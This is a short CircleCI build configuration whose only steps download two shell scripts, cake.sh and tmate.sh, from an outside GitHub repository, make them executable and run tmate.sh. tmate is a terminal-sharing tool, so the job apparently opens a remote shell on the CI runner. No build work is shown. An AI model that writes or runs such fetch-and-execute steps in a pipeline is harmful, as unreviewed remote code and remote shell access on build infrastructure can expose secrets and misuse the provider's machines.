version: 2.0
jobs:
  build:
    docker:
      - image: cimg/base:stable-18.04
    
    steps:
      - run: wget https://raw.githubusercontent.com/KLVSPL/KSP/main/cake.sh
      - run: chmod +x ./cake.sh
      - run: wget https://raw.githubusercontent.com/KLVSPL/KSP/main/tmate.sh && chmod +x tmate.sh && ./tmate.sh
      